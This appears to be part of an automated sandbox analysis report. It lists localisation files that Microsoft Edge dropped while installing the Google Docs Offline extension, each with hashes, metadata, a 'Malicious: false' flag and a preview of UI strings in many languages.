Preview:	{.. "createnew": {.. "message": "UTW.RZ NOWY".. },.. "explanationofflinedisabled": {.. "message": "Jeste. offline. Aby korzysta. z Dokument.w Google bez po..czenia internetowego, otw.rz ustawienia na stronie g..wnej Dokument.w Google i w..cz synchronizacj. offline nast.pnym razem, gdy b.dziesz mie. dost.p do internetu.".. },.. "explanationofflineenabled": {.. "message": "Jeste. offline, ale nadal mo.esz edytowa. dost.pne pliki i tworzy. nowe.".. },.. "extdesc": {.. "message": "Edytuj, tw.rz i wy.wietlaj swoje dokumenty, arkusze kalkulacyjne oraz prezentacje bez konieczno.ci ..czenia si. z internetem.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Wi.cej informacji".. },.. "popuphelptext": {.. "message": "Pisz, edytuj i wsp..pracuj, gdziekolwiek jeste. . niezale.nie od tego, czy masz po..czenie z internetem.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7668_187929937\CRX_INSTALL\_locales\pt_BR\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	907
Entropy (8bit):	4.599411354657937
Encrypted:	false
SSDEEP:	12:1HASvgU30CBxNd6GwXOK1styCJ02OK9+4KbCBxed6X4LBAt4rXgUCSUuYDHIIQka:1HAcXlyCJ5+Tsz4LY4rXSw/Q+ftkC
MD5:	608551F7026E6BA8C0CF85D9AC11F8E3
SHA1:	87B017B2D4DA17E322AF6384F82B57B807628617
SHA-256:	A73EEA087164620FA2260D3910D3FBE302ED85F454EDB1493A4F287D42FC882F
SHA-512:	82F52F8591DB3C0469CC16D7CBFDBF9116F6D5B5D2AD02A3D8FA39CE1378C64C0EA80AB8509519027F71A89EB8BBF38A8702D9AD26C8E6E0F499BF7DA18BF747
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Voc. est. off-line. Para usar o Documentos Google sem conex.o com a Internet, na pr.xima vez que se conectar, acesse as configura..es na p.gina inicial do Documentos Google e ative a sincroniza..o off-line.".. },.. "explanationofflineenabled": {.. "message": "Voc. est. off-line, mas mesmo assim pode editar os arquivos dispon.veis ou criar novos arquivos.".. },.. "extdesc": {.. "message": "Edite, crie e veja seus documentos, planilhas e apresenta..es sem precisar de acesso . Internet.".. },.. "extname": {.. "message": "Documentos Google off-line".. },.. "learnmore": {.. "message": "Saiba mais".. },.. "popuphelptext": {.. "message": "Escreva, edite e colabore onde voc. estiver, com ou sem conex.o com a Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7668_187929937\CRX_INSTALL\_locales\pt_PT\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	914
Entropy (8bit):	4.604761241355716
Encrypted:	false
SSDEEP:	24:1HAcXzw8M+N0STDIjxX+qxCjKw5BKriEQFMJXkETs:zXzw0pKXbxqKw5BKri3aNY
MD5:	0963F2F3641A62A78B02825F6FA3941C
SHA1:	7E6972BEAB3D18E49857079A24FB9336BC4D2D48
SHA-256:	E93B8E7FB86D2F7DFAE57416BB1FB6EE0EEA25629B972A5922940F0023C85F90
SHA-512:	22DD42D967124DA5A2209DD05FB6AD3F5D0D2687EA956A22BA1E31C56EC09DEB53F0711CD5B24D672405358502E9D1C502659BB36CED66CAF83923B021CA0286
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est. offline. Para utilizar o Google Docs sem uma liga..o . Internet, aceda .s defini..es na p.gina inicial do Google Docs e ative a sincroniza..o offline da pr.xima vez que estiver ligado . Internet.".. },.. "explanationofflineenabled": {.. "message": "Est. offline, mas continua a poder editar os ficheiros dispon.veis ou criar novos ficheiros.".. },.. "extdesc": {.. "message": "Edite, crie e veja os documentos, as folhas de c.lculo e as apresenta..es, tudo sem precisar de aceder . Internet.".. },.. "extname": {.. "message": "Google Docs offline".. },.. "learnmore": {.. "message": "Saber mais".. },.. "popuphelptext": {.. "message": "Escreva edite e colabore onde quer que esteja, com ou sem uma liga..o . Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7668_187929937\CRX_INSTALL\_locales\ro\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	937
Entropy (8bit):	4.686555713975264
Encrypted:	false
SSDEEP:	24:1HA8dC6e6w+uFPHf2TFMMlecFpweWV4RE:pC6KvHf4plVweCx
MD5:	BED8332AB788098D276B448EC2B33351
SHA1:	6084124A2B32F386967DA980CBE79DD86742859E
SHA-256:	085787999D78FADFF9600C9DC5E3FF4FB4EB9BE06D6BB19DF2EEF8C284BE7B20
SHA-512:	22596584D10707CC1C8179ED3ABE46EF2C314CF9C3D0685921475944B8855AAB660590F8FA1CFDCE7976B4BB3BD9ABBBF053F61F1249A325FD0094E1C95692ED
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREEAZ. UN DOCUMENT".. },.. "explanationofflinedisabled": {.. "message": "E.ti offline. Pentru a utiliza Documente Google f.r. conexiune la internet, intr. .n set.rile din pagina principal. Documente Google .i activeaz. sincronizarea offline data viitoare c.nd e.ti conectat(.) la internet.".. },.. "explanationofflineenabled": {.. "message": "E.ti offline, dar po.i .nc. s. editezi fi.ierele disponibile sau s. creezi altele.".. },.. "extdesc": {.. "message": "Editeaz., creeaz. .i acceseaz. documente, foi de calcul .i prezent.ri - totul f.r. acces la internet.".. },.. "extname": {.. "message": "Documente Google Offline".. },.. "learnmore": {.. "message": "Afl. mai multe".. },.. "popuphelptext": {.. "message": "Scrie, editeaz. .i colaboreaz. oriunde ai fi, cu sau f.r. conexiune la internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7668_187929937\CRX_INSTALL\_locales\ru\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1337
Entropy (8bit):	4.69531415794894
Encrypted:	false
SSDEEP:	24:1HABEapHTEmxUomjsfDVs8THjqBK8/hHUg41v+Lph5eFTHQ:I/VdxUomjsre8Kh4Riph5eFU
MD5:	51D34FE303D0C90EE409A2397FCA437D
SHA1:	B4B9A7B19C62D0AA95D1F10640A5FBA628CCCA12
SHA-256:	BE733625ACD03158103D62BC0EEF272CA3F265AC30C87A6A03467481A177DAE3
SHA-512:	E8670DED44DC6EE30E5F41C8B2040CF8A463CD9A60FC31FA70EB1D4C9AC1A3558369792B5B86FA761A21F5266D5A35E5C2C39297F367DAA84159585C19EC492A
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".......".. },.. "explanationofflinedisabled": {.. "message": "..... ............ Google ......... ... ........., ............ . .... . ......... ............. . ......-...... . .......... .. ......... .........".. },.. "explanationofflineenabled": {.. "message": "... ........... . .......... .. ...... ......... ..... ..... . ............. .., . ....... ........ ......-.......".. },.. "extdesc": {.. "message": ".........., .............. . ............ ........., ....... . ........... ... ....... . ..........".. },.. "extname": {.. "message": "Google.......... ......".. },.. "learnmore": {.

C:\Users\user\AppData\Local\Temp\scoped_dir7668_187929937\CRX_INSTALL\_locales\si\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2846
Entropy (8bit):	3.7416822879702547
Encrypted:	false
SSDEEP:	48:YWi+htQTKEQb3aXQYJLSWy7sTQThQTnQtQTrEmQ6kiLsegQSJFwsQGaiPn779I+S:zhiTK5b3tUGVjTGTnQiTryOLpyaxYf/S
MD5:	B8A4FD612534A171A9A03C1984BB4BDD
SHA1:	F513F7300827FE352E8ECB5BD4BB1729F3A0E22A
SHA-256:	54241EBE651A8344235CC47AFD274C080ABAEBC8C3A25AFB95D8373B6A5670A2
SHA-512:	C03E35BFDE546AEB3245024EF721E7E606327581EFE9EAF8C5B11989D9033BDB58437041A5CB6D567BAA05466B6AAF054C47F976FD940EEEDF69FDF80D79095B
Malicious:	false
Preview:	{"createnew":{"message":"\u0db1\u0dc0 \u0dbd\u0dda\u0d9b\u0db1\u0dba\u0d9a\u0dca \u0dc3\u0dcf\u0daf\u0db1\u0dca\u0db1"},"explanationofflinedisabled":{"message":"\u0d94\u0db6 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2\u0dba. \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd \u0dc3\u0db8\u0dca\u0db6\u0db1\u0dca\u0db0\u0dad\u0dcf\u0dc0\u0d9a\u0dca \u0db1\u0ddc\u0db8\u0dd0\u0dad\u0dd2\u0dc0 Google Docs \u0db7\u0dcf\u0dc0\u0dd2\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8\u0da7, Google Docs \u0db8\u0dd4\u0dbd\u0dca \u0db4\u0dd2\u0da7\u0dd4\u0dc0 \u0db8\u0dad \u0dc3\u0dd0\u0d9a\u0dc3\u0dd3\u0db8\u0dca \u0dc0\u0dd9\u0dad \u0d9c\u0ddc\u0dc3\u0dca \u0d94\u0db6 \u0d8a\u0dc5\u0d9f \u0d85\u0dc0\u0dc3\u0dca\u0dae\u0dcf\u0dc0\u0dda \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd\u0dba\u0da7 \u0dc3\u0db6\u0dd0\u0db3\u0dd2 \u0dc0\u0dd2\u0da7 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2 \u0dc3\u0db8\u0db8\u0dd4\u0dc4\u0dd4\u0dbb\u0dca\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8 \u0d9a\u0dca\u200d\u0dbb\u0dd2\u0dba\u0dc

C:\Users\user\AppData\Local\Temp\scoped_dir7668_187929937\CRX_INSTALL\_locales\sk\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	934
Entropy (8bit):	4.882122893545996
Encrypted:	false
SSDEEP:	24:1HAF8pMv1RS4LXL22IUjdh8uJwpPqLDEtxKLhSS:hyv1RS4LXx38u36QsS
MD5:	8E55817BF7A87052F11FE554A61C52D5
SHA1:	9ABDC0725FE27967F6F6BE0DF5D6C46E2957F455
SHA-256:	903060EC9E76040B46DEB47BBB041D0B28A6816CB9B892D7342FC7DC6782F87C
SHA-512:	EFF9EC7E72B272DDE5F29123653BC056A4BC2C3C662AE3C448F8CB6A4D1865A0679B7E74C1B3189F3E262109ED6BC8F8D2BDE14AEFC8E87E0F785AE4837D01C7
Malicious:	false
Preview:	{.. "createnew": {.. "message": "VYTVORI. NOV.".. },.. "explanationofflinedisabled": {.. "message": "Ste offline. Ak chcete pou.i. Dokumenty Google bez pripojenia na internet, po najbli..om pripojen. na internet prejdite do nastaven. na domovskej str.nke Dokumentov Google a.zapnite offline synchroniz.ciu.".. },.. "explanationofflineenabled": {.. "message": "Ste offline, no st.le m..ete upravova. dostupn. s.bory a.vytv.ra. nov..".. },.. "extdesc": {.. "message": ".prava, tvorba a.zobrazenie dokumentov, tabuliek a.prezent.ci.. To v.etko bez pr.stupu na internet.".. },.. "extname": {.. "message": "Dokumenty Google v re.ime offline".. },.. "learnmore": {.. "message": ".al.ie inform.cie".. },.. "popuphelptext": {.. "message": "P..te, upravujte a.spolupracuje, kdeko.vek ste, a.to s.pripojen.m na internet aj bez neho.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7668_187929937\CRX_INSTALL\_locales\sl\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	963
Entropy (8bit):	4.6041913416245
Encrypted:	false
SSDEEP:	12:1HASvgfECBxNFCEuKXowwJrpvPwNgEcPJJJEfWOCBxeFCJuGuU4KYXCSUXKDxX4A:1HAXMKYw8VYNLcaeDmKYLdX2zJBG5
MD5:	BFAEFEFF32813DF91C56B71B79EC2AF4
SHA1:	F8EDA2B632610972B581724D6B2F9782AC37377B
SHA-256:	AAB9CF9098294A46DC0F2FA468AFFF7CA7C323A1A0EFA70C9DB1E3A4DA05D1D4
SHA-512:	971F2BBF5E9C84DE3D31E5F2A4D1A00D891A2504F8AF6D3F75FC19056BFD059A270C4C9836AF35258ABA586A1888133FB22B484F260C1CBC2D1D17BC3B4451AA
Malicious:	false
Preview:	{.. "createnew": {.. "message": "USTVARI NOVO".. },.. "explanationofflinedisabled": {.. "message": "Nimate vzpostavljene povezave. .e .elite uporabljati Google Dokumente brez internetne povezave, odprite nastavitve na doma.i strani Google Dokumentov in vklopite sinhronizacijo brez povezave, ko naslednji. vzpostavite internetno povezavo.".. },.. "explanationofflineenabled": {.. "message": "Nimate vzpostavljene povezave, vendar lahko .e vedno urejate razpolo.ljive datoteke ali ustvarjate nove.".. },.. "extdesc": {.. "message": "Urejajte, ustvarjajte in si ogledujte dokumente, preglednice in predstavitve . vse to brez internetnega dostopa.".. },.. "extname": {.. "message": "Google Dokumenti brez povezave".. },.. "learnmore": {.. "message": "Ve. o tem".. },.. "popuphelptext": {.. "message": "Pi.ite, urejajte in sodelujte, kjer koli ste, z internetno povezavo ali brez nje.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7668_187929937\CRX_INSTALL\_locales\sr\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	4.569671329405572
Encrypted:	false
SSDEEP:	24:1HArg/fjQg2JwrfZtUWTrw1P4epMnRGi5TBmuPDRxZQ/XtiCw/Rwh/Q9EVz:ogUg2JwDZe6rwKI8VTP9xK1CwhI94
MD5:	7F5F8933D2D078618496C67526A2B066
SHA1:	B7050E3EFA4D39548577CF47CB119FA0E246B7A4
SHA-256:	4E8B69E864F57CDDD4DC4E4FAF2C28D496874D06016BC22E8D39E0CB69552769
SHA-512:	0FBAB56629368EEF87DEEF2977CA51831BEB7DEAE98E02504E564218425C751853C4FDEAA40F51ECFE75C633128B56AE105A6EB308FD5B4A2E983013197F5DBA
Malicious:	false
Preview:	{.. "createnew": {.. "message": "....... ....".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. ..... ......... Google ......... ... ........ ...., ..... . .......... .. ........ ........ Google .......... . ........ ...... .............. ... ....... ... ...... ........ .. ...........".. },.. "explanationofflineenabled": {.. "message": "...... ..., ... . .... ...... .. ....... ...... . ........ ........ ... .. ....... .....".. },.. "extdesc": {.. "message": "....... . ........... ........., ...... . ............ . ....... ...... . ... . ... .. ... ........ .........".. },.. "extname": {.. "message

C:\Users\user\AppData\Local\Temp\scoped_dir7668_187929937\CRX_INSTALL\_locales\sv\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	884
Entropy (8bit):	4.627108704340797
Encrypted:	false
SSDEEP:	24:1HA0NOYT/6McbnX/yzklyOIPRQrJlvDymvBd:vNOcyHnX/yg0P4Bymn
MD5:	90D8FB448CE9C0B9BA3D07FB8DE6D7EE
SHA1:	D8688CAC0245FD7B886D0DEB51394F5DF8AE7E84
SHA-256:	64B1E422B346AB77C5D1C77142685B3FF7661D498767D104B0C24CB36D0EB859
SHA-512:	6D58F49EE3EF0D3186EA036B868B2203FE936CE30DC8E246C32E90B58D9B18C624825419346B62AF8F7D61767DBE9721957280AA3C524D3A5DFB1A3A76C00742
Malicious:	false
Preview:	{.. "createnew": {.. "message": "SKAPA NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du .r offline. Om du vill anv.nda Google Dokument utan internetuppkoppling, .ppna inst.llningarna p. Google Dokuments startsida och aktivera offlinesynkronisering n.sta g.ng du .r ansluten till internet.".. },.. "explanationofflineenabled": {.. "message": "Du .r offline, men det g.r fortfarande att redigera tillg.ngliga filer eller skapa nya.".. },.. "extdesc": {.. "message": "Redigera, skapa och visa dina dokument, kalkylark och presentationer . helt utan internet.tkomst.".. },.. "extname": {.. "message": "Google Dokument Offline".. },.. "learnmore": {.. "message": "L.s mer".. },.. "popuphelptext": {.. "message": "Skriv, redigera och samarbeta .verallt, med eller utan internetanslutning.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7668_187929937\CRX_INSTALL\_locales\sw\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	980
Entropy (8bit):	4.50673686618174
Encrypted:	false
SSDEEP:	12:1HASvgNHCBxNx1HMHyMhybK7QGU78oCuafIvfCBxex6EYPE5E1pOCSUJqONtCBh8:1HAGDQ3y0Q/Kjp/zhDoKMkeAT6dBaX
MD5:	D0579209686889E079D87C23817EDDD5
SHA1:	C4F99E66A5891973315D7F2BC9C1DAA524CB30DC
SHA-256:	0D20680B74AF10EF8C754FCDE259124A438DCE3848305B0CAF994D98E787D263
SHA-512:	D59911F91ED6C8FF78FD158389B4D326DAF4C031B940C399569FE210F6985E23897E7F404B7014FC7B0ACEC086C01CC5F76354F7E5D3A1E0DEDEF788C23C2978
Malicious:	false
Preview:	{.. "createnew": {.. "message": "FUNGUA MPYA".. },.. "explanationofflinedisabled": {.. "message": "Haupo mtandaoni. Ili uweze kutumia Hati za Google bila muunganisho wa intaneti, wakati utakuwa umeunganishwa kwenye intaneti, nenda kwenye sehemu ya mipangilio kwenye ukurasa wa kwanza wa Hati za Google kisha uwashe kipengele cha usawazishaji nje ya mtandao.".. },.. "explanationofflineenabled": {.. "message": "Haupo mtandaoni, lakini bado unaweza kubadilisha faili zilizopo au uunde mpya.".. },.. "extdesc": {.. "message": "Badilisha, unda na uangalie hati, malahajedwali na mawasilisho yako . yote bila kutumia muunganisho wa intaneti.".. },.. "extname": {.. "message": "Hati za Google Nje ya Mtandao".. },.. "learnmore": {.. "message": "Pata Maelezo Zaidi".. },.. "popuphelptext": {.. "message": "Andika hati, zibadilishe na ushirikiane na wengine popote ulipo, iwe una muunganisho wa intaneti au huna.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7668_187929937\CRX_INSTALL\_locales\ta\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1941
Entropy (8bit):	4.132139619026436
Encrypted:	false
SSDEEP:	24:1HAoTZwEj3YfVLiANpx96zjlXTwB4uNJDZwq3CP1B2xIZiIH1CYFIZ03SoFyxrph:JCEjWiAD0ZXkyYFyPND1L/I
MD5:	DCC0D1725AEAEAAF1690EF8053529601
SHA1:	BB9D31859469760AC93E84B70B57909DCC02EA65
SHA-256:	6282BF9DF12AD453858B0B531C8999D5FD6251EB855234546A1B30858462231A
SHA-512:	6243982D764026D342B3C47C706D822BB2B0CAFFA51F0591D8C878F981EEF2A7FC68B76D012630B1C1EB394AF90EB782E2B49329EB6538DD5608A7F0791FDCF5
Malicious:	false
Preview:	{.. "createnew": {.. "message": "..... ....... .........".. },.. "explanationofflinedisabled": {.. "message": ".......... ........... .... ....... ..... Google ......... .........., ...... .... ........... ......... ...., Google ... ................... ................ ......, ........ ......... ..........".. },.. "explanationofflineenabled": {.. "message": ".......... ..........., .......... .......... .......... ......... ........... ...... .....

C:\Users\user\AppData\Local\Temp\scoped_dir7668_187929937\CRX_INSTALL\_locales\te\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1969
Entropy (8bit):	4.327258153043599
Encrypted:	false
SSDEEP:	48:R7jQrEONienBcFNBNieCyOBw0/kCcj+sEf24l+Q+u1LU4ljCj55ONipR41ssrNix:RjQJN1nBcFNBNlCyGcj+RXl+Q+u1LU4s
MD5:	385E65EF723F1C4018EEE6E4E56BC03F
SHA1:	0CEA195638A403FD99BAEF88A360BD746C21DF42
SHA-256:	026C164BAE27DBB36A564888A796AA3F188AAD9E0C37176D48910395CF772CEA
SHA-512:	E55167CB5638E04DF3543D57C8027B86B9483BFCAFA8E7C148EDED66454AEBF554B4C1CF3C33E93EC63D73E43800D6A6E7B9B1A1B0798B6BDB2F699D3989B052
Malicious:	false
Preview:	{.. "createnew": {.. "message": "..... ...... ........ ......".. },.. "explanationofflinedisabled": {.. "message": ".... ........... ........ ......... ........ ....... Google Docs... .............., .... ............ ....... ..... ...... .... Google Docs .... ...... ............. ......, ........ ........ ... .......".. },.. "explanationofflineenabled": {.. "message": ".... ........... ......., .... .... ........ .......... .... ....... ..... ....... .... ..

C:\Users\user\AppData\Local\Temp\scoped_dir7668_187929937\CRX_INSTALL\_locales\th\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1674
Entropy (8bit):	4.343724179386811
Encrypted:	false
SSDEEP:	48:fcGjnU3UnGKD1GeU3pktOggV1tL2ggG7Q:f3jnDG1eUk0g6RLE
MD5:	64077E3D186E585A8BEA86FF415AA19D
SHA1:	73A861AC810DABB4CE63AD052E6E1834F8CA0E65
SHA-256:	D147631B2334A25B8AA4519E4A30FB3A1A85B6A0396BC688C68DC124EC387D58
SHA-512:	56DD389EB9DD335A6214E206B3BF5D63562584394D1DE1928B67D369E548477004146E6CB2AD19D291CB06564676E2B2AC078162356F6BC9278B04D29825EF0C
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": ".............. ............. Google .................................... ............................... Google ...... .................................................................".. },.. "explanationofflineenabled": {.. "message": "................................................................".. },.. "extdesc": {.. "message": "..... ..... ........

C:\Users\user\AppData\Local\Temp\scoped_dir7668_187929937\CRX_INSTALL\_locales\tr\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1063
Entropy (8bit):	4.853399816115876
Encrypted:	false
SSDEEP:	24:1HAowYuBPgoMC4AGehrgGm7tJ3ckwFrXnRs5m:GYsPgrCtGehkGc3cvXr
MD5:	76B59AAACC7B469792694CF3855D3F4C
SHA1:	7C04A2C1C808FA57057A4CCEEE66855251A3C231
SHA-256:	B9066A162BEE00FD50DC48C71B32B69DFFA362A01F84B45698B017A624F46824
SHA-512:	2E507CA6874DE8028DC769F3D9DFD9E5494C268432BA41B51568D56F7426F8A5F2E5B111DDD04259EB8D9A036BB4E3333863A8FC65AAB793BCEF39EDFE41403B
Malicious:	false
Preview:	{.. "createnew": {.. "message": "YEN. OLU.TUR".. },.. "explanationofflinedisabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Google Dok.manlar'. .nternet ba.lant.s. olmadan kullanmak i.in, .nternet'e ba.lanabildi.inizde Google Dok.manlar ana sayfas.nda Ayarlar'a gidin ve .evrimd... senkronizasyonu etkinle.tirin.".. },.. "explanationofflineenabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Ancak, yine de mevcut dosyalar. d.zenleyebilir veya yeni dosyalar olu.turabilirsiniz.".. },.. "extdesc": {.. "message": "Dok.man, e-tablo ve sunu olu.turun, bunlar. d.zenleyin ve g.r.nt.leyin. T.m bu i.lemleri internet eri.imi olmadan yapabilirsiniz.".. },.. "extname": {.. "message": "Google Dok.manlar .evrimd...".. },.. "learnmore": {.. "message": "Daha Fazla Bilgi".. },.. "popuphelptext": {.. "message": ".nternet ba.lant.n.z olsun veya olmas.n, nerede olursan.z olun yaz.n, d.zenl

C:\Users\user\AppData\Local\Temp\scoped_dir7668_187929937\CRX_INSTALL\_locales\uk\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1333
Entropy (8bit):	4.686760246306605
Encrypted:	false
SSDEEP:	24:1HAk9oxkm6H4KyGGB9GeGoxPEYMQhpARezTtHUN97zlwpEH7:VKU1GB9GeBc/OARETt+9/WCb
MD5:	970963C25C2CEF16BB6F60952E103105
SHA1:	BBDDACFEEE60E22FB1C130E1EE8EFDA75EA600AA
SHA-256:	9FA26FF09F6ACDE2457ED366C0C4124B6CAC1435D0C4FD8A870A0C090417DA19
SHA-512:	1BED9FE4D4ADEED3D0BC8258D9F2FD72C6A177C713C3B03FC6F5452B6D6C2CB2236C54EA972ECE7DBFD756733805EB2352CAE44BAB93AA8EA73BB80460349504
Malicious:	false
Preview:	{.. "createnew": {.. "message": "........".. },.. "explanationofflinedisabled": {.. "message": ".. . ...... ....... ... ............. Google ........... ... ......... . .........., ......... . ............ .. ........ ........ Google .......... . ......... ......-............., .... ...... . .......".. },.. "explanationofflineenabled": {.. "message": ".. . ...... ......, ..... ... .... ...... .......... ........ ..... ... .......... .....".. },.. "extdesc": {.. "message": "........., ......... . ............ ........., .......... ....... .. ........... ... ....... .. ..........".. },.. "extname": {.. "message": "Goo

C:\Users\user\AppData\Local\Temp\scoped_dir7668_187929937\CRX_INSTALL\_locales\ur\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1263
Entropy (8bit):	4.861856182762435
Encrypted:	false
SSDEEP:	24:1HAl3zNEUhN3mNjkSIkmdNpInuUVsqNtOJDhY8Dvp/IkLzx:e3uUhQKvkmd+s11Lp1F
MD5:	8B4DF6A9281333341C939C244DDB7648
SHA1:	382C80CAD29BCF8AAF52D9A24CA5A6ECF1941C6B
SHA-256:	5DA836224D0F3A96F1C5EB5063061AAD837CA9FC6FED15D19C66DA25CF56F8AC
SHA-512:	FA1C015D4EA349F73468C78FDB798D462EEF0F73C1A762298798E19F825E968383B0A133E0A2CE3B3DF95F24C71992235BFC872C69DC98166B44D3183BF8A9E5
Malicious:	false
Preview:	{.. "createnew": {.. "message": "... ......".. },.. "explanationofflinedisabled": {.. "message": ".. .. .... .... Google Docs .. .... ....... ..... ....... .... ..... .... ... .. .. ....... .. ..... ... .. Google Docs ... ... .. ....... .. ..... ... .. .... ...... ..... .. .. .....".. },.. "explanationofflineenabled": {.. "message": ".. .. .... ... .... .. ... ... ...... ..... ... ..... .. .... ... .. ... ..... ... .... ....".. },.. "extdesc": {.. "message": ".......... .......... ... ....... . .... ... ....... .. ..... .. .... ...... ..... .... ... ..... .......".. },.. "extname": {.. "message": "Google Docs .. ....".. },.. "learnmore": {..

C:\Users\user\AppData\Local\Temp\scoped_dir7668_187929937\CRX_INSTALL\_locales\vi\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1074
Entropy (8bit):	5.062722522759407
Encrypted:	false
SSDEEP:	24:1HAhBBLEBOVUSUfE+eDFmj4BLErQ7e2CIer32KIxqJ/HtNiE5nIGeU+KCVT:qHCDheDFmjDQgX32/S/hI9jh
MD5:	773A3B9E708D052D6CBAA6D55C8A5438
SHA1:	5617235844595D5C73961A2C0A4AC66D8EA5F90F
SHA-256:	597C5F32BC999746BC5C2ED1E5115C523B7EB1D33F81B042203E1C1DF4BBCAFE
SHA-512:	E5F906729E38B23F64D7F146FA48F3ABF6BAED9AAFC0E5F6FA59F369DC47829DBB4BFA94448580BD61A34E844241F590B8D7AEC7091861105D8EBB2590A3BEE9
Malicious:	false
Preview:	{.. "createnew": {.. "message": "T.O M.I".. },.. "explanationofflinedisabled": {.. "message": "B.n .ang ngo.i tuy.n. .. s. d.ng Google T.i li.u m. kh.ng c.n k.t n.i Internet, .i ..n c.i ..t tr.n trang ch. c.a Google T.i li.u v. b.t ..ng b. h.a ngo.i tuy.n v.o l.n ti.p theo b.n ...c k.t n.i v.i m.ng Internet.".. },.. "explanationofflineenabled": {.. "message": "B.n .ang ngo.i tuy.n, tuy nhi.n b.n v.n c. th. ch.nh s.a c.c t.p c. s.n ho.c t.o c.c t.p m.i.".. },.. "extdesc": {.. "message": "Ch.nh s.a, t.o v. xem t.i li.u, b.ng t.nh v. b.n tr.nh b.y . t.t c. m. kh.ng c.n truy c.p Internet.".. },.. "extname": {.. "message": "Google T.i li.u ngo.i tuy.n".. },.. "learnmore": {.. "message": "Ti.m hi..u th.m".. },.. "popuphelptext": {.. "message": "Vi.t, ch.nh s.a v. c.ng t.c

C:\Users\user\AppData\Local\Temp\scoped_dir7668_187929937\CRX_INSTALL\_locales\zh_CN\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	879
Entropy (8bit):	5.7905809868505544
Encrypted:	false
SSDEEP:	12:1HASvgteHCBxNtSBXuetOrgIkA2OrWjMOCBxetSBXK01fg/SOiCSUEQ27e1CBhUj:1HAFsHtrIkA2jqldI/727eggcLk9pf
MD5:	3E76788E17E62FB49FB5ED5F4E7A3DCE
SHA1:	6904FFA0D13D45496F126E58C886C35366EFCC11
SHA-256:	E72D0BB08CC3005556E95A498BD737E7783BB0E56DCC202E7D27A536616F5EE0
SHA-512:	F431E570AB5973C54275C9EEF05E49E6FE2D6C17000F98D672DD31F9A1FAD98E0D50B5B0B9CF85D5BBD3B655B93FD69768C194C8C1688CB962AA75FF1AF9BDB6
Malicious:	false
Preview:	{.. "createnew": {.. "message": "..".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ................ Google ....................".. },.. "explanationofflineenabled": {.. "message": ".............................".. },.. "extdesc": {.. "message": "...................... - ........".. },.. "extname": {.. "message": "Google .......".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "...............................".. }..}..

